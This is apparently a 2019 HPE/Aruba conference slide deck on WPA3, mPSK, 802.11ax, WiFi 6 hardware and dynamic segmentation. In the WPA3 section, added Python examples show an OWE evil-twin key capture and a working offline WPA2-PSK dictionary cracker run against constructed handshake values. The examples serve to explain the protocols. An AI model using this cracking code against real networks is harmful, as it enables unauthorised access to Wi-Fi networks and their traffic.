3 - Uninett 2019 - final · 2019-01-17



Agenda: Uninett wireless gathering 2019

• WPA3
• mPSK
• 802.11ax
• WiFi 6 hardware
• Dynamic Segmentation

WPA3
Anders Lagerqvist, anders@hpe.com

January 2019


Why WPA3: WPA2 is past retirement

– WPA2-Personal is vulnerable to brute-force and dictionary attacks if the passphrase is short or guessable: the PMK is derived from the passphrase alone, so one captured handshake can be attacked offline.

– WPA2-Enterprise is still solid security-wise, but is susceptible to deauthentication attacks, because management frames are unauthenticated unless 802.11w is enabled. WPA3 makes Protected Management Frames (802.11w) mandatory.

– WPA3 is a Wi-Fi Alliance effort to address these issues.

– WPA3 and KRACK: WPA3 still uses the 4-way handshake (see SAE below), so protection against key reinstallation comes from patched implementations and the Wi-Fi Alliance's certification tests rather than from a new handshake.

WPA3

OPPORTUNISTIC WIRELESS ENCRYPTION (OWE)

WPA3 OWE: What is it?

– Evolutionary advance of wireless security

– Fix flaws, improve robustness, provide more options to cover more use cases

– Open gets replaced by OWE, Opportunistic Wireless Encryption (RFC 8110; certified by the Wi-Fi Alliance as Wi-Fi CERTIFIED Enhanced Open)
– Problem: on an Open network all wireless traffic is passed in the clear
– Solution: client and AP run an unauthenticated Diffie-Hellman exchange during association, so every client gets its own encrypted link
– Caveat: OWE authenticates neither side, so it stops passive eavesdropping but not an active attacker running a rogue AP (evil twin)
– Too many captive portals still use Open
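The association-time key derivation that OWE performs, shown as an added example written from RFC 8110; this is not code from the presentation, nor Aruba/HPE code. It carries a minimal pure-Python NIST P-256 (IANA group 19, the mandatory OWE group) so it runs offline; the x-only encoding of the public keys in the Diffie-Hellman Parameter element and the 32-byte big-endian encoding of the shared secret are assumptions made for this demo. The last function shows the caveat above: an active attacker who sits between client and AP simply runs two OWE exchanges and ends up with both PMKs.

```python
import hashlib
import hmac
import secrets

# NIST P-256 domain parameters (IANA group 19). Affine coordinates, None = point at infinity.
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)
GROUP_ID = 19   # carried in the DH Parameter element and mixed into the HKDF salt


def ec_add(p, q):
    """Point addition on P-256 (demo only: not constant time)."""
    if p is None:
        return q
    if q is None:
        return p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P      # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, point):
    """Double-and-add scalar multiplication."""
    result = None
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result


def encode_point(pt):
    """Assumed encoding for this demo: the x-coordinate as 32 big-endian bytes."""
    return pt[0].to_bytes(32, "big")


def owe_derive(z, c_pub, a_pub, group=GROUP_ID):
    """RFC 8110 section 4.4 (SHA-256 for group 19):
    prk   = HKDF-Extract(salt = C | A | group, IKM = z)
    PMK   = HKDF-Expand(prk, "OWE Key Generation", 32)   -> one HMAC block
    PMKID = Truncate-128(SHA-256(C | A))"""
    salt = c_pub + a_pub + group.to_bytes(2, "big")
    prk = hmac.new(salt, z, hashlib.sha256).digest()
    pmk = hmac.new(prk, b"OWE Key Generation" + b"\x01", hashlib.sha256).digest()
    pmkid = hashlib.sha256(c_pub + a_pub).digest()[:16]
    return pmk, pmkid


def owe_exchange(client_priv, ap_priv):
    """Both sides of one OWE association. The client sends C in the Association Request,
    the AP answers with A in the Association Response; returns (client view, AP view)."""
    c_point, a_point = ec_mul(client_priv, G), ec_mul(ap_priv, G)
    c_pub, a_pub = encode_point(c_point), encode_point(a_point)
    z_client = encode_point(ec_mul(client_priv, a_point))   # shared secret as seen by the client
    z_ap = encode_point(ec_mul(ap_priv, c_point))           # and by the AP
    return owe_derive(z_client, c_pub, a_pub), owe_derive(z_ap, c_pub, a_pub)


def active_attacker_view(client_priv, attacker_priv, ap_priv):
    """An evil twin runs one exchange with the client and one with the real AP.
    Nothing in OWE lets either victim notice; the attacker holds both PMKs."""
    (client_pmk, _), (att_client_pmk, _) = owe_exchange(client_priv, attacker_priv)
    (att_ap_pmk, _), (ap_pmk, _) = owe_exchange(attacker_priv, ap_priv)
    return client_pmk == att_client_pmk and ap_pmk == att_ap_pmk


if __name__ == "__main__":
    client_priv = secrets.randbelow(N - 1) + 1
    ap_priv = secrets.randbelow(N - 1) + 1
    (pmk, pmkid), (pmk2, _) = owe_exchange(client_priv, ap_priv)
    print("PMK match:", pmk == pmk2, "PMKID:", pmkid.hex())
    print("evil twin holds both PMKs:", active_attacker_view(client_priv, 12345, ap_priv))
```

The PMKID lets the client and AP cache the PMK and skip the Diffie-Hellman exchange on re-association; the 4-way handshake that follows is the same one WPA2 uses.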

WPA3

SIMULTANEOUS AUTHENTICATION OF EQUALS (SAE)

WPA3: Uses PSK/passwords properly

– Problem with WPA2-PSK: offline dictionary attack
– Attacker witnesses one 4-way handshake
– Runs through candidate passwords offline, up to 400,000 per second, until one reproduces the captured MIC; no further contact with the network is needed

– WPA2-PSK is replaced by SAE (802.11-2016, section 12.4)
– Originally intended for mesh security
– Password-based authentication (a PAKE, the Dragonfly exchange)
– Resistant to active, passive, and dictionary attack

– SAE uses 802.11 authentication frames
– Authentication generates a PMK; association indicates the PMKID
– Post-association 4-way handshake generates the traffic encryption keys

– Provisioning is identical to WPA2-PSK: the user enters a password just like always, but under the covers the password is never exposed to an offline attack. An attacker gets at most one guess per live SAE exchange, so password quality still matters, just far less than with WPA2-PSK.
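The offline attack the slide describes, as an added example that is not part of the presentation or of any vendor code: WPA2-PSK derives the PMK from passphrase and SSID with PBKDF2, expands it into the PTK from the two MACs and two nonces, and proves possession with a MIC over message 2. Everything an attacker needs is in the captured handshake, so each candidate passphrase can be tested without sending a packet. All capture values below (SSID, MACs, nonces, EAPOL bytes, passphrase) are constructed for the demo. SAE removes exactly this property: the PMK is the output of an interactive exchange, not a function of the passphrase alone.

```python
import hashlib
import hmac

# Constructed "capture" of one WPA2-PSK 4-way handshake; none of this is a real network.
SSID = b"uninett-demo"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes.fromhex("11" * 32)   # nonce from message 1 (AP -> STA)
SNONCE = bytes.fromhex("22" * 32)   # nonce from message 2 (STA -> AP)
# EAPOL-Key message 2 as the attacker hashes it: header, key info, counter, SNonce,
# remaining fields, and the 16-byte MIC field zeroed out (all constructed filler).
EAPOL_MSG2 = bytes.fromhex("0103007502010a00") + bytes(16) + SNONCE + bytes(66)
REAL_PASSPHRASE = b"correct horse"  # what the victim typed; unknown to the attacker


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the only salt, so the whole computation can be replayed offline."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK expansion; MACs and nonces are ordered so both sides build the same input."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (AKM 2) MIC: HMAC-SHA1 over the EAPOL frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def mic_for(passphrase: bytes) -> bytes:
    """What the attacker recomputes for every candidate passphrase."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]  # KCK = first 128 bits of PTK
    return eapol_mic(kck, EAPOL_MSG2)


# The single value the attacker actually took from message 2 of the capture.
CAPTURED_MIC = mic_for(REAL_PASSPHRASE)


def crack(wordlist, captured_mic: bytes):
    """Offline dictionary attack: only hashing, no interaction with the AP."""
    for candidate in wordlist:
        if hmac.compare_digest(mic_for(candidate), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    words = [b"password", b"letmein", b"uninett2019", b"correct horse"]
    print("recovered passphrase:", crack(words, CAPTURED_MIC))
```

The 4096-iteration PBKDF2 is the only cost per guess, which is why the figure of hundreds of thousands of guesses per second on GPUs is realistic. Under SAE the captured handshake no longer gives the attacker an oracle to test guesses against.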

mPSK
Anders Lagerqvist, anders@hpe.com

January 2019

mPSK: What is it?

– With mPSK the network can be designed with a different passphrase per device or per group, on a single SSID.

– The RADIUS server verifies the client's MAC address against its database or user tables and returns that device's passphrase, encrypted, to the controller in an Aruba VSA (Aruba-mPSK-Passphrase).

Note: it is common, and in many cases a best practice, to use MAC auth also on regular PSK today to profile clients and assign different roles or VLANs, but it is not mandatory. With mPSK the MAC address only selects which passphrase applies; a client that spoofs a MAC still has to know that device's passphrase to join.

opmode          PSK    mPSK
Passphrase      1      many
RADIUS server   No     MAC auth

802.11ax
Anders Lagerqvist, anders@hpe.com

January 2019


What is 802.11ax?

– 802.11ax is the new IEEE standard for Wi-Fi, aka WiFi 6

– 802.11n and 802.11ac were designed to improve Wi-Fi performance while 802.11ax is aimed at optimizing efficiency and solving problems in high density environments

– With the previous generation of standards, the focus was on enhancing the peak data rate, but with 802.11ax it’s all about maximizing capacity and ensuring that all devices in a crowded network get the bandwidth they require


802.11ax technology

Increase 4x average throughput per device in a dense deployment scenario

Enhanced operation in 2.4 & 5 GHz bands (802.11ac was only 5 GHz)

Improve power efficiency of client devices

Improve performance of outdoor and indoor networks


802.11ax compared with .11n and .11ac

802.11n (2008), High Throughput
• 2.4 and 5 GHz
• Wider channels (40 MHz)
• Higher rates (64-QAM)
• Additional streams (up to 4)
• Beam forming (explicit and implicit)
• Backwards compatibility with 11a/b/g

802.11ac (2012), Very High Throughput
• 5 GHz only
• Even wider channels (80, 160 MHz)
• Higher rates (256-QAM)
• Additional streams (up to 8)
• Beam forming (explicit)
• Multi-user MIMO
• Backwards compatibility with 11a/b/g/n

802.11ax (2018), High Efficiency
• 2.4 GHz and 5 GHz
• Higher rates (1024-QAM)
• Multi-user MIMO, 8 clients
• OFDMA uplink and downlink
• Better battery life (Target Wake Time, TWT)
• Spatial re-use (BSS color) for higher density networks
• Enhanced outdoor long-range performance
• Backwards compatibility with 11a/b/g/n/ac


Uplink Multi-User MIMO

[Figure: two 2x2 channel diagrams. Left, "11n/ac UL SU-MIMO": one client transmits streams x1 and x2 through the channel (h11, h12, h21, h22) to an AP that receives y1 and y2. Right, "11ax UL MU-MIMO": the same channel, but x1 and x2 are transmitted by two different clients.]

In both cases the AP receives

$y_1 = \sqrt{P/2}\,h_{11}x_1 + \sqrt{P/2}\,h_{12}x_2 + n_1$

$y_2 = \sqrt{P/2}\,h_{21}x_1 + \sqrt{P/2}\,h_{22}x_2 + n_2$

where P is the transmit power, split evenly over the two streams, and n_1, n_2 is receiver noise.

• UL MU-MIMO is mathematically equivalent to UL SU-MIMO
• Why was it not included in 11ac? Maintaining that equivalence in practice requires time synchronization, frequency alignment, and power normalization between all clients in an MU group, which a single client gets for free
• A protocol to address this has been added to 11ax for both UL OFDMA and MU-MIMO (the trigger frame)

WiFi 6 hardware
Anders Lagerqvist, anders@hpe.com

January 2019

Introducing: Aruba 510 Series Campus Access Points

Product Introduction – 510 Series Campus Access Points

– High-level, what are we introducing
– 802.11ax, first of many, portfolio fit
– AP product overview, specifications
– Critical features, capabilities (802.11ax, Green AP, IPM, Zigbee)
– Power consumption

Product Introduction – 510 Series Campus Access Points

– Zigbee: the new AP platform integrates with common building systems:
  – Ventilation
  – Lights
  – Doors
  – Elevators
  – Minibars

NetNordic is deploying The Hub hotel in Oslo with Aruba WiFi and Zigbee and expects to save around 2M NOK since they won't need a secondary Zigbee network.

Dynamic Segmentation
Tore Henriksen, tore.henriksen@hpe.com

January 2019

Understanding Device & IoT Connectivity Options

• Customers want to manage what devices connect
• Only some devices support secure connections
• 50% of IoT may be wired
• ClearPass supports any customer infrastructure and need

Visibility – the first step

SOFTWARE CONTROLS FOR "COLORLESS" PORTS

[Figure: Aruba switches at the access layer, with device and user identity stores feeding ClearPass.]

• Ports assigned to new VLANs through ClearPass based on device type
• IoT devices on the wired network connecting to any port
• Prevention against malware and insider threats
• Secure per-device tunneling to the Aruba Mobility Controller


User-Based Tunnel: What is it?

• UBT uses the concept of a colorless access port
• It doesn't matter what you connect to the port
• Roles and policies are assigned per device
• Authentication takes place at the access port level
• Successful authentication enforces VLAN and ACL assignments
• Can create a user- or device-based tunnel to the Mobility Controller
• The Mobility Controller can enforce additional security

[Figure: topology Access Switch -> Core Switch -> Aruba Mobility Controller, with ClearPass as the policy server. Example endpoints on the access switch: IoT (device profiling), Captive Portal, 802.1X, IP Phone (MAC-Auth). Policy inputs: user/role, device type/health, location, time/day.]

Enforce a per-device policy

DEMO